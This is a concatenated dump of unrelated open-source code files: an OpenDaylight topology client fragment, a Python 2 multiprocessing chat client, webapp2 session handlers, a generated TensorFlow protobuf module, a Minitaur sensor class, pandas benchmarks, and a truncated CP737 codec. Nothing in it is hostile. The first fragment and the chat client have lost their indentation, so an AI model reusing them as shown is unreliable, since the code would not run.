class NetworkTopologyClient(client.OpenDaylightRestClient):
_GET_ODL_NETWORK_TOPOLOGY_URL =\
'restconf/operational/network-topology:network-topology'
def __init__(self, url, username, password, timeout):
if url:
url = parse.urlparse(url)
port = ''
if url.port:
port = ':' + str(url.port)
topology_url = '{}://{}{}/{}'.format(
url.scheme, url.hostname, port,
self._GET_ODL_NETWORK_TOPOLOGY_URL)
else:
topology_url = None
super(NetworkTopologyClient, self).__init__(
topology_url, username, password, timeout)
| apache-2.0 | 132,776,603,059,931,380 | 38.659375 | 79 | 0.588527 | false |
tayebzaidi/PPLL_Spr_16 | chat/client3.py | 1 | 1260 | from multiprocessing.connection import Client
from random import random
from time import sleep
from multiprocessing.connection import Listener
from multiprocessing import Process
local_listener = (('127.0.0.1', 5003),'secret client 3 password')
def client_listener():
cl = Listener(address=local_listener[0], authkey=local_listener[1])
print '.............client listener starting'
    print '.............accepting connections'
while True:
conn = cl.accept()
print '.............connection accepted from', cl.last_accepted
m = conn.recv()
print '.............message received from server', m
if __name__ == '__main__':
print 'trying to connect'
conn = Client(address=('127.0.0.1', 6000), authkey='secret password server')
conn.send(local_listener)
cl = Process(target=client_listener, args=())
cl.start()
connected = True
while connected:
        value = raw_input("'C' to stay connected, 'Q' to quit connection: ")
if value == 'Q':
connected = False
else:
print "continue connected"
conn.send("connected")
print "last message"
conn.send("quit")
conn.close()
cl.terminate()
print "end client"
| gpl-3.0 | 7,113,699,005,899,186,000 | 28.302326 | 80 | 0.605556 | false |
laalaguer/gae-blog-module | gaesession/handlers.py | 1 | 7633 | import webapp2
from webapp2_extras import sessions
class MainHandler(webapp2.RequestHandler):
def get(self):
# Session is stored on both client browser and our database
session_1 = self.session_store.get_session(name='dbcookie',backend='datastore')
previous_value_1 = session_1.get("my_attr_name")
self.response.out.write('on db, ' + str(previous_value_1))
session_1["my_attr_name"] = "Hi! " + (previous_value_1 if previous_value_1 else "")
self.response.out.write('<br>')
# Session is stored on client browser only
session_2 = self.session_store.get_session(name='clientcookie')
previous_value_2 = session_2.get('my_attr_name')
self.response.out.write('on client browser, ' + str(previous_value_2))
session_2['my_attr_name'] = "Hi! " + (previous_value_2 if previous_value_2 else "")
self.response.out.write('<br>')
# Session is stored on both client browser and our memcache for fast access
session_3 = self.session_store.get_session(name='memcachecookie',backend="memcache")
previous_value_3 = session_3.get('my_attr_name')
self.response.out.write('on memcache, ' + str(previous_value_3))
session_3['my_attr_name'] = "Hi! " + (previous_value_3 if previous_value_3 else "")
# this is needed for webapp2 sessions to work
def dispatch(self):
# Get a session store for this request.
self.session_store = sessions.get_store(request=self.request)
try:
webapp2.RequestHandler.dispatch(self)
finally:
# Save all sessions.
self.session_store.save_sessions(self.response)
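# --- Illustrative wiring (a sketch, not part of the original module) ---
# webapp2's session store needs a secret key in the application config before
# self.session_store can be used; the key value and the route below are
# assumptions for demonstration only.
_example_config = {
    'webapp2_extras.sessions': {'secret_key': 'replace-with-a-real-secret'},
}
# app = webapp2.WSGIApplication([('/', MainHandler)], config=_example_config)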
class MainHandlerWithArguments(webapp2.RequestHandler):
def get(self, photo_key): # even with arguments, we call with dispatch(self)
# Session is stored on both client browser and our database
session_1 = self.session_store.get_session(name='dbcookie',backend='datastore')
previous_value_1 = session_1.get("my_attr_name")
self.response.out.write('on db, ' + str(previous_value_1))
session_1["my_attr_name"] = "Hi! " + (previous_value_1 if previous_value_1 else "")
self.response.out.write('<br>')
# Session is stored on client browser only
session_2 = self.session_store.get_session(name='clientcookie')
previous_value_2 = session_2.get('my_attr_name')
self.response.out.write('on client browser, ' + str(previous_value_2))
session_2['my_attr_name'] = "Hi! " + (previous_value_2 if previous_value_2 else "")
self.response.out.write('<br>')
# Session is stored on both client browser and our memcache for fast access
session_3 = self.session_store.get_session(name='memcachecookie',backend="memcache")
previous_value_3 = session_3.get('my_attr_name')
self.response.out.write('on memcache, ' + str(previous_value_3))
session_3['my_attr_name'] = "Hi! " + (previous_value_3 if previous_value_3 else "")
# this is needed for webapp2 sessions to work
def dispatch(self):
# Get a session store for this request.
self.session_store = sessions.get_store(request=self.request)
try:
webapp2.RequestHandler.dispatch(self)
finally:
# Save all sessions.
self.session_store.save_sessions(self.response)
from google.appengine.ext.webapp import blobstore_handlers
from google.appengine.ext import blobstore
class MyUploadHandler(blobstore_handlers.BlobstoreUploadHandler):
def my_post_dispatch(self, *args, **kwargs):
''' A Fake dispatch method that you want to call inside your Route()
Just an imitation of the webapp2 style dispatch() with limited functions
'''
self.session_store = sessions.get_store(request=self.request)
try:
if self.request.method == 'POST':
self.post(*args, **kwargs) # since webapp doesn't have dispatch() method like webapp2, we do it manually
else:
self.error(405)
self.response.out.write('Method not allowed')
finally:
# Save all sessions.
self.session_store.save_sessions(self.response)
def wrapper(func):
def dest(self, *args, **kwargs):
print 'before decorated' # for your future use. you can write wrapper like 'user_required'
func(self,*args, **kwargs)
print 'after decorated'
return dest
@wrapper
def post(self):
# Get all the uploaded file info
myfiles = self.get_uploads('file') # this is a list of blob key info
# You do some operations on the myfiles, maybe transform them
# maybe associate them with other ndb entities in your database
# ...
# But we also want to manipulate with the session, RIGHT ???
# Session is stored on both client browser and our database
session_1 = self.session_store.get_session(name='dbcookie',backend='datastore')
previous_value_1 = session_1.get("my_attr_name")
self.response.out.write('on db, ' + str(previous_value_1))
session_1["my_attr_name"] = "Hi! " + (previous_value_1 if previous_value_1 else "")
self.response.out.write('<br>')
# Session is stored on client browser only
session_2 = self.session_store.get_session(name='clientcookie')
previous_value_2 = session_2.get('my_attr_name')
self.response.out.write('on client browser, ' + str(previous_value_2))
session_2['my_attr_name'] = "Hi! " + (previous_value_2 if previous_value_2 else "")
self.response.out.write('<br>')
# Session is stored on both client browser and our memcache for fast access
session_3 = self.session_store.get_session(name='memcachecookie',backend="memcache")
previous_value_3 = session_3.get('my_attr_name')
self.response.out.write('on memcache, ' + str(previous_value_3))
session_3['my_attr_name'] = "Hi! " + (previous_value_3 if previous_value_3 else "")
        # Finally, I delete them, just in case you won't let it go.
[blobstore.delete(each.key()) for each in self.get_uploads('file')]
class ServeBlobHandler(blobstore_handlers.BlobstoreDownloadHandler):
''' Serve the images to the public '''
def my_get_dispatch(self, *args, **kwargs):
''' A Fake dispatch method that you want to call inside your Route()
Just an imitation of the webapp2 style dispatch() with limited functions
'''
self.session_store = sessions.get_store(request=self.request)
try:
if self.request.method == 'GET':
self.get(*args, **kwargs) # this is the real get method we want here
else:
self.error(405)
self.response.out.write('Method not allowed')
finally:
# Save all sessions.
self.session_store.save_sessions(self.response)
def wrapper(func):
def dest(self, *args, **kwargs):
print 'before decorated' # for your future use. you can write wrapper like 'user_required'
func(self,*args, **kwargs)
print 'after decorated'
return dest
@wrapper
def get(self, photo_key):
if not blobstore.get(photo_key):
self.error(404)
else:
self.send_blob(photo_key) | apache-2.0 | -2,670,067,092,621,807,600 | 45.266667 | 120 | 0.617844 | false |
fluxcapacitor/pipeline | libs/pipeline_model/tensorflow/core/framework/tensor_slice_pb2.py | 1 | 4870 | # Generated by the protocol buffer compiler. DO NOT EDIT!
# source: tensorflow/core/framework/tensor_slice.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
DESCRIPTOR = _descriptor.FileDescriptor(
name='tensorflow/core/framework/tensor_slice.proto',
package='tensorflow',
syntax='proto3',
serialized_pb=_b('\n,tensorflow/core/framework/tensor_slice.proto\x12\ntensorflow\"\x80\x01\n\x10TensorSliceProto\x12\x33\n\x06\x65xtent\x18\x01 \x03(\x0b\x32#.tensorflow.TensorSliceProto.Extent\x1a\x37\n\x06\x45xtent\x12\r\n\x05start\x18\x01 \x01(\x03\x12\x10\n\x06length\x18\x02 \x01(\x03H\x00\x42\x0c\n\nhas_lengthB2\n\x18org.tensorflow.frameworkB\x11TensorSliceProtosP\x01\xf8\x01\x01\x62\x06proto3')
)
_TENSORSLICEPROTO_EXTENT = _descriptor.Descriptor(
name='Extent',
full_name='tensorflow.TensorSliceProto.Extent',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='start', full_name='tensorflow.TensorSliceProto.Extent.start', index=0,
number=1, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='length', full_name='tensorflow.TensorSliceProto.Extent.length', index=1,
number=2, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
_descriptor.OneofDescriptor(
name='has_length', full_name='tensorflow.TensorSliceProto.Extent.has_length',
index=0, containing_type=None, fields=[]),
],
serialized_start=134,
serialized_end=189,
)
_TENSORSLICEPROTO = _descriptor.Descriptor(
name='TensorSliceProto',
full_name='tensorflow.TensorSliceProto',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='extent', full_name='tensorflow.TensorSliceProto.extent', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[_TENSORSLICEPROTO_EXTENT, ],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=61,
serialized_end=189,
)
_TENSORSLICEPROTO_EXTENT.containing_type = _TENSORSLICEPROTO
_TENSORSLICEPROTO_EXTENT.oneofs_by_name['has_length'].fields.append(
_TENSORSLICEPROTO_EXTENT.fields_by_name['length'])
_TENSORSLICEPROTO_EXTENT.fields_by_name['length'].containing_oneof = _TENSORSLICEPROTO_EXTENT.oneofs_by_name['has_length']
_TENSORSLICEPROTO.fields_by_name['extent'].message_type = _TENSORSLICEPROTO_EXTENT
DESCRIPTOR.message_types_by_name['TensorSliceProto'] = _TENSORSLICEPROTO
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
TensorSliceProto = _reflection.GeneratedProtocolMessageType('TensorSliceProto', (_message.Message,), dict(
Extent = _reflection.GeneratedProtocolMessageType('Extent', (_message.Message,), dict(
DESCRIPTOR = _TENSORSLICEPROTO_EXTENT,
__module__ = 'tensorflow.core.framework.tensor_slice_pb2'
# @@protoc_insertion_point(class_scope:tensorflow.TensorSliceProto.Extent)
))
,
DESCRIPTOR = _TENSORSLICEPROTO,
__module__ = 'tensorflow.core.framework.tensor_slice_pb2'
# @@protoc_insertion_point(class_scope:tensorflow.TensorSliceProto)
))
_sym_db.RegisterMessage(TensorSliceProto)
_sym_db.RegisterMessage(TensorSliceProto.Extent)
DESCRIPTOR.has_options = True
DESCRIPTOR._options = _descriptor._ParseOptions(descriptor_pb2.FileOptions(), _b('\n\030org.tensorflow.frameworkB\021TensorSliceProtosP\001\370\001\001'))
try:
# THESE ELEMENTS WILL BE DEPRECATED.
# Please use the generated *_pb2_grpc.py files instead.
import grpc
from grpc.beta import implementations as beta_implementations
from grpc.beta import interfaces as beta_interfaces
from grpc.framework.common import cardinality
from grpc.framework.interfaces.face import utilities as face_utilities
except ImportError:
pass
# @@protoc_insertion_point(module_scope)
| apache-2.0 | 6,296,427,293,374,174,000 | 35.343284 | 406 | 0.742094 | false |
nrz/ylikuutio | external/bullet3/examples/pybullet/gym/pybullet_envs/minitaur/envs_v2/sensors/sensor.py | 2 | 15551 | # Lint as: python3
"""A sensor prototype class.
The concept is explained in: go/minitaur-gym-redesign-1.1
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from typing import Any, Iterable, Optional, Sequence, Text, Tuple, Union
import gin
import gym
import numpy as np
from pybullet_envs.minitaur.robots import robot_base
from pybullet_envs.minitaur.robots import time_ordered_buffer
_ARRAY = Sequence[float]
_FloatOrArray = Union[float, _ARRAY]
_DataTypeList = Iterable[Any]
# For sensor with multiput outputs, key of the main observation in output dict.
MAIN_OBS_KEY = ""
# This allows referencing np.float32 in gin config files. For example:
# lidar_sensor.LidarSensor.dtype = @np.float32
gin.external_configurable(np.float32, module="np")
gin.external_configurable(np.float64, module="np")
gin.external_configurable(np.uint8, module="np")
# Observation blenders take a pair of low/high values. The low/high is measured
# by the latency of the observation. So the low value is actually newer in time
# and the high value older. The coeff in [0, 1] can be thought of as the
# distance between the low and high values, with 0 being 100% low value and 1
# being 100% high value.
def linear_obs_blender(low_value: Any, high_value: Any, coeff: float):
"""Linear interpolation of low/high values based on coefficient value."""
return low_value * (1 - coeff) + high_value * coeff
def closest_obs_blender(low_value: Any, high_value: Any, coeff: float):
"""Choosing the high or low value based on coefficient value."""
return low_value if coeff < 0.5 else high_value
def newer_obs_blender(low_value: Any, unused_high_value: Any,
unused_coeff: float):
"""Always choosing low value, which is the newer value between low/high."""
return low_value
def older_obs_blender(unused_low_value: Any, high_value: Any,
unused_coeff: float):
"""Always choosing the high value, which is the older value between low/high."""
return high_value
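# --- Illustrative checks (not part of the original module) ---
# With coeff == 0 the blenders favor the low (newer) value; linear blending
# moves toward the high (older) value as coeff grows toward 1.
assert linear_obs_blender(0.0, 1.0, 0.0) == 0.0
assert linear_obs_blender(0.0, 1.0, 0.25) == 0.25
assert closest_obs_blender(0.0, 1.0, 0.7) == 1.0
assert newer_obs_blender(0.0, 1.0, 0.9) == 0.0
assert older_obs_blender(0.0, 1.0, 0.1) == 1.0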
@gin.configurable
class Sensor(object):
"""A prototype class of sensors."""
def __init__(
self,
name: Text,
sensor_latency: _FloatOrArray,
interpolator_fn: Any,
enable_debug_visualization: bool = False,
):
"""A basic constructor of the sensor.
We do not provide a robot instance during __init__, as robot instances may
be reloaded/recreated during the simulation.
Args:
name: the name of the sensor
sensor_latency: There are two ways to use this expected sensor latency.
For both methods, the latency should be in the same unit as the sensor
data timestamp. 1. As a single float number, the observation will be a
1D array. For real robots, this should be set to 0.0. 2. As an array of
floats, the observation will be a 2D array based on how long the history
need to be. Thus, [0.0, 0.1, 0.2] is a history length of 3. Observations
are stacked on a new axis appended after existing axes.
interpolator_fn: Function that controls how to interpolate the two values
that is returned from the time ordered buffer.
enable_debug_visualization: Whether to draw debugging visualization.
"""
self._robot = None
self._name = name
# Observation space will be implemented by derived classes.
self._observation_space = None
self._sensor_latency = sensor_latency
self._single_latency = True if isinstance(sensor_latency,
(float, int)) else False
self._enable_debug_visualization = enable_debug_visualization
if not self._is_valid_latency():
raise ValueError("sensor_latency is expected to be a non-negative number "
"or a non-empty list of non-negative numbers.")
self._interpolator_fn = interpolator_fn or newer_obs_blender
self._axis = -1
timespan = sensor_latency if self._single_latency else max(sensor_latency)
self._observation_buffer = time_ordered_buffer.TimeOrderedBuffer(
max_buffer_timespan=timespan)
def _is_valid_latency(self):
if self._single_latency:
return self._sensor_latency >= 0
if self._sensor_latency:
return all(value >= 0 for value in self._sensor_latency)
return False
def get_name(self) -> Text:
return self._name
@property
def is_single_latency(self) -> bool:
return self._single_latency
@property
def observation_space(self) -> gym.spaces.Space:
return self._observation_space
@property
def enable_debug_visualization(self):
return self._enable_debug_visualization
@enable_debug_visualization.setter
def enable_debug_visualization(self, enable):
self._enable_debug_visualization = enable
def get_observation_datatype(self):
"""Returns the data type for the numpy structured array.
It is recommended to define a list of tuples: (name, datatype, shape)
Reference: https://docs.scipy.org/doc/numpy-1.15.0/user/basics.rec.html
Ex:
return [('motor_angles', np.float64, (8, ))] # motor angle sensor
return [('IMU_x', np.float64), ('IMU_z', np.float64), ] # IMU
Will be deprecated (b/150818246) in favor of observation_space.
Returns:
datatype: a list of data types.
"""
raise NotImplementedError("Deprecated. Are you using the old robot class?")
def get_lower_bound(self):
"""Returns the lower bound of the observation.
Will be deprecated (b/150818246) in favor of observation_space.
Returns:
lower_bound: the lower bound of sensor values in np.array format
"""
raise NotImplementedError("Deprecated. Are you using the old robot class?")
def get_upper_bound(self):
"""Returns the upper bound of the observation.
Will be deprecated (b/150818246) in favor of observation_space.
Returns:
upper_bound: the upper bound of sensor values in np.array format
"""
raise NotImplementedError("Deprecated. Are you using the old robot class?")
def _get_original_observation(self) -> Tuple[float, Any]:
"""Gets the non-modified observation.
    Different from get_observation, which can pollute the sensor data with
    noise and latency, this method shall return the best-effort measurements of
    the sensor. For simulated robots, this will return the clean data. For real
    robots, just return the measurements as is. All inherited classes shall
    implement this method.
Returns:
The timestamp and the original sensor measurements.
Raises:
NotImplementedError for the base class.
"""
raise NotImplementedError("Not implemented for base class." "")
def get_observation(self):
"""Returns the observation data.
Returns:
observation: the observed sensor values in np.array format
"""
obs = self._observation_buffer.get_delayed_value(self._sensor_latency)
if self._single_latency:
if isinstance(self._observation_space, gym.spaces.Dict):
return self._interpolator_fn(obs.value_0, obs.value_1, obs.coeff)
else:
return np.asarray(
self._interpolator_fn(obs.value_0, obs.value_1, obs.coeff))
else:
if isinstance(self._observation_space, gym.spaces.Dict):
# interpolate individual sub observation
interpolated = [
self._interpolator_fn(data.value_0, data.value_1, data.coeff)
for data in obs
]
stacked_per_sub_obs = {}
for k in interpolated[0]:
stacked_per_sub_obs[k] = np.stack(
np.asarray([d[k] for d in interpolated]), axis=self._axis)
return stacked_per_sub_obs
else:
obs = np.asarray([
self._interpolator_fn(data.value_0, data.value_1, data.coeff)
for data in obs
])
return np.stack(obs, axis=self._axis)
def set_robot(self, robot: robot_base.RobotBase):
"""Set a robot instance."""
self._robot = robot
def get_robot(self):
"""Returns the robot instance."""
return self._robot
def on_reset(self, env):
"""A callback function for the reset event.
Args:
env: the environment who invokes this callback function.
"""
self._env = env
self._observation_buffer.reset()
self.on_new_observation()
def on_step(self, env):
"""A callback function for the control step event.
Args:
env: the environment who invokes this callback function.
"""
pass
def visualize(self):
"""Visualizes the sensor information."""
pass
def on_new_observation(self):
"""A callback for each observation received.
To be differentiated from on_step, which will be called only once per
    control step (i.e. env.step), this API will be called every time in the
substep/action repeat loop, when new observations are expected. Each derived
sensor class should implement this API by implementing:
my_obs = call env/robot api to get the observation
self._observation_buffer.add(my_obs)
"""
timestamp, obs = self._get_original_observation()
if self._enable_debug_visualization:
self.visualize()
self._observation_buffer.add(timestamp, obs)
def on_terminate(self, env):
"""A callback function for the terminate event.
Args:
env: the environment who invokes this callback function.
"""
pass
def _stack_space(self,
space: Union[gym.spaces.Box, gym.spaces.Dict],
dtype: np.dtype = None) -> Any:
"""Returns stacked version of observation space.
    This stacks a gym.spaces.Box or gym.spaces.Dict observation space based on
    the length of the sensor latency and the axis for stacking specified in the
    sensor. A gym.spaces.Box is just stacked, but a gym.spaces.Dict is
    recursively stacked, preserving its dictionary structure while stacking
    any gym.spaces.Box contained within. For example, the input observation space:
gym.spaces.Dict({
'space_1': gym.spaces.Box(low=0, high=10, shape=(1,)),
'space_2': gym.spaces.Dict({
'space_3': gym.spaces.Box(low=0, high=10, shape=(2,)),
}),
}))
would be converted to the following if sensor latency was [0, 1]:
gym.spaces.Dict({
'space_1': gym.spaces.Box(low=0, high=10, shape=(1, 2)),
'space_2': gym.spaces.Dict({
'space_3': gym.spaces.Box(low=0, high=10, shape=(2, 2)),
}),
}))
Args:
space: A gym.spaces.Dict or gym.spaces.Box to be stacked.
dtype: Datatype for the stacking.
Returns:
      stacked_space: A stacked version of the observation space.
"""
if self._single_latency:
return space
# Allow sensors such as last_action_sensor to override the dtype.
dtype = dtype or space.dtype
if isinstance(space, gym.spaces.Box):
return self._stack_space_box(space, dtype)
elif isinstance(space, gym.spaces.Dict):
return self._stack_space_dict(space, dtype)
else:
raise ValueError(f"Space {space} is an unsupported type.")
def _stack_space_box(self, space: gym.spaces.Box,
dtype: np.dtype) -> gym.spaces.Box:
"""Returns stacked version of a box observation space.
    This stacks a gym.spaces.Box observation space based on the length of the
    sensor latency and the axis for stacking specified in the sensor.
Args:
space: A gym.spaces.Box to be stacked.
dtype: Datatype for the stacking
Returns:
      stacked_space: A stacked version of the gym.spaces.Box observation space.
"""
length = len(self._sensor_latency)
stacked_space = gym.spaces.Box(
low=np.repeat(
np.expand_dims(space.low, axis=self._axis), length,
axis=self._axis),
high=np.repeat(
np.expand_dims(space.high, axis=self._axis),
length,
axis=self._axis),
dtype=dtype)
return stacked_space
def _stack_space_dict(self, space: gym.spaces.Dict,
dtype: np.dtype) -> gym.spaces.Dict:
"""Returns stacked version of a dict observation space.
    This stacks a gym.spaces.Dict observation space based on the length of the
    sensor latency and the recursive structure of the gym.spaces.Dict itself.
Args:
space: A gym.spaces.Dict to be stacked.
dtype: Datatype for the stacking.
Returns:
      stacked_space: A stacked version of the dictionary observation space.
"""
return gym.spaces.Dict([
(k, self._stack_space(v, dtype)) for k, v in space.spaces.items()
])
def _encode_obs_dict_keys(self, obs_dict):
"""Encodes sub obs keys of observation dict or observsation space dict."""
return {encode_sub_obs_key(self, k): v for k, v in obs_dict.items()}
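# --- Illustrative sketch (not part of the original module) ---
# A minimal concrete Sensor following the pattern described in
# on_new_observation(): read a raw value and push it into the buffer. The
# robot methods GetTimestamp() and GetBasePosition() are hypothetical
# placeholders, not the API of any particular robot class.
class ExampleBasePositionSensor(Sensor):
  def __init__(self, sensor_latency=0.0):
    super(ExampleBasePositionSensor, self).__init__(
        name="base_position",
        sensor_latency=sensor_latency,
        interpolator_fn=linear_obs_blender)
    # A list-valued sensor_latency would stack a history along the last axis.
    self._observation_space = self._stack_space(
        gym.spaces.Box(low=-np.inf, high=np.inf, shape=(3,), dtype=np.float64))
  def _get_original_observation(self):
    # Timestamp plus the raw measurement, as expected by on_new_observation().
    return self._robot.GetTimestamp(), np.asarray(self._robot.GetBasePosition())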
class BoxSpaceSensor(Sensor):
"""A prototype class of sensors with Box shapes."""
def __init__(self,
name: Text,
shape: Tuple[int, ...],
lower_bound: _FloatOrArray = -np.pi,
upper_bound: _FloatOrArray = np.pi,
dtype=np.float64) -> None:
"""Constructs a box type sensor.
Will be deprecated (b/150818246) once we switch to gym spaces.
Args:
name: the name of the sensor
shape: the shape of the sensor values
lower_bound: the lower_bound of sensor value, in float or np.array.
upper_bound: the upper_bound of sensor value, in float or np.array.
dtype: data type of sensor value
"""
super(BoxSpaceSensor, self).__init__(
name=name, sensor_latency=0.0, interpolator_fn=newer_obs_blender)
self._shape = shape
self._dtype = dtype
if isinstance(lower_bound, float):
self._lower_bound = np.full(shape, lower_bound, dtype=dtype)
else:
self._lower_bound = np.array(lower_bound)
if isinstance(upper_bound, float):
self._upper_bound = np.full(shape, upper_bound, dtype=dtype)
else:
self._upper_bound = np.array(upper_bound)
def set_robot(self, robot):
    # Since the old robot classes do not inherit from RobotBase, we can enforce
    # the check here.
if isinstance(robot, robot_base.RobotBase):
      raise ValueError(
          "Cannot use new robot interface RobotBase with old sensor class.")
self._robot = robot
def get_shape(self) -> Tuple[int, ...]:
return self._shape
def get_dimension(self) -> int:
return len(self._shape)
def get_dtype(self):
return self._dtype
def get_observation_datatype(self) -> _DataTypeList:
"""Returns box-shape data type."""
return [(self._name, self._dtype, self._shape)]
def get_lower_bound(self) -> _ARRAY:
"""Returns the computed lower bound."""
return self._lower_bound
def get_upper_bound(self) -> _ARRAY:
"""Returns the computed upper bound."""
return self._upper_bound
def get_observation(self) -> np.ndarray:
return np.asarray(self._get_observation(), dtype=self._dtype)
def _get_original_observation(self) -> Tuple[float, Any]:
    # Maintains compatibility with the new sensor classes.
raise NotImplementedError("Not implemented for this class.")
def on_new_observation(self):
    # Maintains compatibility with the new sensor classes.
pass
def encode_sub_obs_key(s: Sensor, sub_obs_name: Optional[Text]):
"""Returns a sub observation key for use in observation dictionary."""
if sub_obs_name == MAIN_OBS_KEY:
return s.get_name()
else:
return f"{s.get_name()}/{sub_obs_name}"
| agpl-3.0 | 3,822,107,709,921,278,000 | 33.481153 | 82 | 0.663301 | false |
winklerand/pandas | asv_bench/benchmarks/replace.py | 1 | 2171 | from .pandas_vb_common import *
class replace_fillna(object):
goal_time = 0.2
def setup(self):
self.N = 1000000
try:
self.rng = date_range('1/1/2000', periods=self.N, freq='min')
except NameError:
self.rng = DatetimeIndex('1/1/2000', periods=self.N, offset=datetools.Minute())
self.date_range = DateRange
self.ts = Series(np.random.randn(self.N), index=self.rng)
def time_replace_fillna(self):
self.ts.fillna(0.0, inplace=True)
class replace_large_dict(object):
goal_time = 0.2
def setup(self):
self.n = (10 ** 6)
self.start_value = (10 ** 5)
self.to_rep = {i: self.start_value + i for i in range(self.n)}
self.s = Series(np.random.randint(self.n, size=(10 ** 3)))
def time_replace_large_dict(self):
self.s.replace(self.to_rep, inplace=True)
class replace_convert(object):
goal_time = 0.5
def setup(self):
self.n = (10 ** 3)
self.to_ts = {i: pd.Timestamp(i) for i in range(self.n)}
self.to_td = {i: pd.Timedelta(i) for i in range(self.n)}
self.s = Series(np.random.randint(self.n, size=(10 ** 3)))
self.df = DataFrame({'A': np.random.randint(self.n, size=(10 ** 3)),
'B': np.random.randint(self.n, size=(10 ** 3))})
def time_replace_series_timestamp(self):
self.s.replace(self.to_ts)
def time_replace_series_timedelta(self):
self.s.replace(self.to_td)
def time_replace_frame_timestamp(self):
self.df.replace(self.to_ts)
def time_replace_frame_timedelta(self):
self.df.replace(self.to_td)
class replace_replacena(object):
goal_time = 0.2
def setup(self):
self.N = 1000000
try:
self.rng = date_range('1/1/2000', periods=self.N, freq='min')
except NameError:
self.rng = DatetimeIndex('1/1/2000', periods=self.N, offset=datetools.Minute())
self.date_range = DateRange
self.ts = Series(np.random.randn(self.N), index=self.rng)
def time_replace_replacena(self):
self.ts.replace(np.nan, 0.0, inplace=True)
| bsd-3-clause | 1,624,599,673,181,421,300 | 30.014286 | 91 | 0.587748 | false |
DarioGT/OMS-PluginXML | org.modelsphere.sms/lib/jython-2.2.1/Lib/encodings/cp737.py | 1 | 7357 | """ Python Character Mapping Codec generated from 'CP737.TXT' with gencodec.py.
Written by Marc-Andre Lemburg ([email protected]).
(c) Copyright CNRI, All Rights Reserved. NO WARRANTY.
(c) Copyright 2000 Guido van Rossum.
"""#"
import codecs
### Codec APIs
class Codec(codecs.Codec):
def encode(self,input,errors='strict'):
return codecs.charmap_encode(input,errors,encoding_map)
def decode(self,input,errors='strict'):
return codecs.charmap_decode(input,errors,decoding_map)
class StreamWriter(Codec,codecs.StreamWriter):
pass
class StreamReader(Codec,codecs.StreamReader):
pass
### encodings module API
def getregentry():
return (Codec().encode,Codec().decode,StreamReader,StreamWriter)
### Decoding Map
decoding_map = codecs.make_identity_dict(range(256))
decoding_map.update({
0x0080: 0x0391, # GREEK CAPITAL LETTER ALPHA
0x0081: 0x0392, # GREEK CAPITAL LETTER BETA
0x0082: 0x0393, # GREEK CAPITAL LETTER GAMMA
0x0083: 0x0394, # GREEK CAPITAL LETTER DELTA
0x0084: 0x0395, # GREEK CAPITAL LETTER EPSILON
0x0085: 0x0396, # GREEK CAPITAL LETTER ZETA
0x0086: 0x0397, # GREEK CAPITAL LETTER ETA
0x0087: 0x0398, # GREEK CAPITAL LETTER THETA
0x0088: 0x0399, # GREEK CAPITAL LETTER IOTA
0x0089: 0x039a, # GREEK CAPITAL LETTER KAPPA
0x008a: 0x039b, # GREEK CAPITAL LETTER LAMDA
0x008b: 0x039c, # GREEK CAPITAL LETTER MU
0x008c: 0x039d, # GREEK CAPITAL LETTER NU
0x008d: 0x039e, # GREEK CAPITAL LETTER XI
0x008e: 0x039f, # GREEK CAPITAL LETTER OMICRON
0x008f: 0x03a0, # GREEK CAPITAL LETTER PI
0x0090: 0x03a1, # GREEK CAPITAL LETTER RHO
0x0091: 0x03a3, # GREEK CAPITAL LETTER SIGMA
0x0092: 0x03a4, # GREEK CAPITAL LETTER TAU
0x0093: 0x03a5, # GREEK CAPITAL LETTER UPSILON
0x0094: 0x03a6, # GREEK CAPITAL LETTER PHI
0x0095: 0x03a7, # GREEK CAPITAL LETTER CHI
0x0096: 0x03a8, # GREEK CAPITAL LETTER PSI
0x0097: 0x03a9, # GREEK CAPITAL LETTER OMEGA
0x0098: 0x03b1, # GREEK SMALL LETTER ALPHA
0x0099: 0x03b2, # GREEK SMALL LETTER BETA
0x009a: 0x03b3, # GREEK SMALL LETTER GAMMA
0x009b: 0x03b4, # GREEK SMALL LETTER DELTA
0x009c: 0x03b5, # GREEK SMALL LETTER EPSILON
0x009d: 0x03b6, # GREEK SMALL LETTER ZETA
0x009e: 0x03b7, # GREEK SMALL LETTER ETA
0x009f: 0x03b8, # GREEK SMALL LETTER THETA
0x00a0: 0x03b9, # GREEK SMALL LETTER IOTA
0x00a1: 0x03ba, # GREEK SMALL LETTER KAPPA
0x00a2: 0x03bb, # GREEK SMALL LETTER LAMDA
0x00a3: 0x03bc, # GREEK SMALL LETTER MU
0x00a4: 0x03bd, # GREEK SMALL LETTER NU
0x00a5: 0x03be, # GREEK SMALL LETTER XI
0x00a6: 0x03bf, # GREEK SMALL LETTER OMICRON
0x00a7: 0x03c0, # GREEK SMALL LETTER PI
0x00a8: 0x03c1, # GREEK SMALL LETTER RHO
0x00a9: 0x03c3, # GREEK SMALL LETTER SIGMA
0x00aa: 0x03c2, # GREEK SMALL LETTER FINAL SIGMA
0x00ab: 0x03c4, # GREEK SMALL LETTER TAU
0x00ac: 0x03c5, # GREEK SMALL LETTER UPSILON
0x00ad: 0x03c6, # GREEK SMALL LETTER PHI
0x00ae: 0x03c7, # GREEK SMALL LETTER CHI
0x00af: 0x03c8, # GREEK SMALL LETTER PSI
